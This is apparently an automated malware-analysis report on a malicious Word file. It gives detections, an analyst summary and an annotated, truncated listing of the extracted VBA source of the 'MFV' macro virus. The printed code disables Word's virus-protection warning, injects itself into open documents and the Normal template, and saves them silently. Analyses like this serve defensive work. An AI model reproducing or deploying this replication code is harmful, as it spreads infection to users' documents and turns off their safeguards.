MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a malicious Word document whose VBA project contains a 'Document_Open' auto-macro, a common initial-execution trigger. The extracted code is a self-replicating macro virus that calls itself 'MFV' ("My First Virus"): it sets Options.VirusProtection = False and then, through the VBProject object model, copies itself into every open document and into the Normal template so that other documents carry the infection. The only payload visible in the extracted source is a date-triggered (19 March) prank that clips the Word window to an ellipse and shows Office Assistant balloons; no network access, file download or dropped executable appears in the code shown, so the "downloader or dropper" characterization is not supported by this listing (note the preview is truncated). The ClamAV signature 'Doc.Trojan.Gullible-1' is consistent with the macro-virus classification. Practitioner caveat: replication relies on programmatic access to the VBA project, which current Office versions block by default unless "Trust access to the VBA project object model" is enabled, so the sample is mainly a threat to legacy or permissively configured Word installations.
Heuristics 3
-
ClamAV: Doc.Trojan.Gullible-1 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Gullible-1
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: document contains VBA macro code
-
Document_Open macro — high — OLE_VBA_DOCOPEN: a Document_Open auto-macro runs automatically when the document is opened (if macros are enabled)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20865 bytes |
SHA-256: d10a21b893edc8ca0f185a8544fd9048ba8bfd17ccf89ae71c3581a1ab803184 |
|||
|
Detection
ClamAV:
Doc.Trojan.Gullible-1
Obfuscation or payload:
unlikely (the only obfuscation visible is a lightly encoded string: the author-name check in MFV builds "S. Bach" from Chr(Val("&H..")) calls)
|
|||
Preview script — first 1,000 lines of the extracted script (the listing below is truncated in the middle of the Infect routine)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' The Attribute lines above are module metadata for the ThisDocument class
' module as decoded by olevba; they are not executable code.
' Win32 API imports used only by the date-triggered payload in MFV:
' FindWindow locates the Word main window (class "OpusApp"),
' CreateEllipticRgn builds an elliptical region and SetWindowRgn clips the
' window to it. None of these touch files or the network.
Private Declare Function SetWindowRgn Lib "user32" (ByVal hWnd As Long, ByVal hRgn As Long, ByVal bRedraw As Boolean) As Long
Private Declare Function CreateEllipticRgn Lib "gdi32" (ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
' MFV ("My First Virus"): main routine of the macro virus.
' Method is a one-letter event tag supplied by the caller; "O" and "C" are
' tested below (presumably Document_Open / Document_Close, but the calling
' auto-macros are not in this listing). Side effects: flips
' Options.VirusProtection, rewrites the VBA project of every open document
' and of the Normal template, and may save those documents to disk.
Private Sub MFV(Method As String)
Dim Doc As Document, Comp, CodeMod As Object, SaveIt As Boolean, i As Integer
' Author-immunity check. The Chr(Val("&H..")) calls decode to the literal
' "S. Bach". On that user name the virus does not replicate: it only shows
' a message box (German: "I am here again!") when Method = "O", re-enables
' Word's virus protection and exits.
If Application.UserName = Chr(Val("&H53")) + Chr(Val("&H2E")) + Chr(Val("&H20")) + Chr(Val("&H42")) + Chr(Val("&H61")) + Chr(Val("&H63")) + Chr(Val("&H68")) Then
If Method = "O" Then MsgBox "Ich bin wieder hier!", vbOKOnly + vbDefaultButton1 + vbInformation, "MFV"
Options.VirusProtection = True
Exit Sub
End If
' Disable Word's macro virus-protection warning before replicating.
Options.VirusProtection = False
'Infection
' Replicate into every open document. SaveIt remembers whether the document
' had no unsaved changes; after injecting into each document-type component
' (Comp.Type = 100 is presumably vbext_ct_Document, i.e. the ThisDocument
' module -- confirm), the document is saved only if it was already clean and
' exists on disk, so the infection persists without a save prompt.
For Each Doc In Documents
SaveIt = Doc.Saved
For Each Comp In Doc.VBProject.VBComponents
If Comp.Type = 100 Then Call Infect(Comp.CodeModule)
Next
If SaveIt And (Dir(Doc.FullName) <> "") Then Doc.Save
Next
' Infect the Normal template so documents based on it carry the virus too.
Call Infect(Normal.ThisDocument.VBProject.VBComponents(1).CodeModule)
'Destruction
' Payload, triggered only when Method = "C" on 19 March: resize the Word
' window to 500x500, clip the main window ("OpusApp" class) to an ellipse and
' show two modal Office Assistant balloons announcing the infection. Nothing
' here reads or writes files or uses the network.
If Method = "C" And (Format(Date, "dd-mm") = "19-03") Then
Assistant.Visible = True
Assistant.Animation = MsoAnimationType.msoAnimationGetTechy
Application.WindowState = wdWindowStateNormal
Application.Width = 500
Application.Height = 500
SetWindowRgn FindWindow("OpusApp", vbNullString), CreateEllipticRgn(0, 0, 600, 600), True
With Assistant.NewBalloon
.BalloonType = MsoBalloonType.msoBalloonTypeNumbers
.Mode = MsoModeType.msoModeModal
.Icon = MsoIconType.msoIconAlert
.Button = MsoButtonSetType.msoButtonSetCancel
.Heading = "MFV"
.Text = MacroContainer.Name & " was infected by MFV (My First Virus)"
.Show
End With
Assistant.Animation = MsoAnimationType.msoAnimationThinking
With Assistant.NewBalloon
.BalloonType = MsoBalloonType.msoBalloonTypeNumbers
.Mode = MsoModeType.msoModeModal
.Icon = MsoIconType.msoIconTip
.Button = MsoButtonSetType.msoButtonSetCancel
.Heading = "MFV"
.Text = "This virus is not harmful. Belive me!" & vbCrLf & "Your window was only deformed, not more!" & vbCrLf & vbCrLf & "This virus is freeware. You may give it to anyone!"
.Show
End With
End If
End Sub
Private Sub Infect(CodeMod As Object)
Dim StartOpen As Integer, StartClose As Integer, StartNew As Integer, IsInfected As Boolean
Dim Sex As Object, DoIt As Boolean, i As Integer
IsInfected = False: StartOpen = 0: StartClose = 0: StartNew = 0
For i = 1 To CodeMod.CountOfLines
If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("Sub Document_Open()")) Then StartOpen = i
If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("Sub Document_Close()")) Then StartClose = i
If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("Sub Document_New()")) Then StartNew = i
If InStr(1, UCase(CodeMod.Lines(i, 1)), UCase("'Infected by My first Virus")) Then IsInfected = True
Next i
If Not IsInfected Then
CodeMod.AddFromString "Private Declare Function SetWindowRgn Lib " & Chr(34) & "user32" & Chr(34) & " (ByVal hWnd As Long, ByVal hRgn As Long, ByVal bRedraw As Boolean) As Long"
CodeMod.AddFromString "Private Declare Function CreateEllipticRgn Lib " & Chr(34) & "gdi32" & Chr(34) & " (ByVal X1 As Long, ByVal Y1 As Long
... (truncated)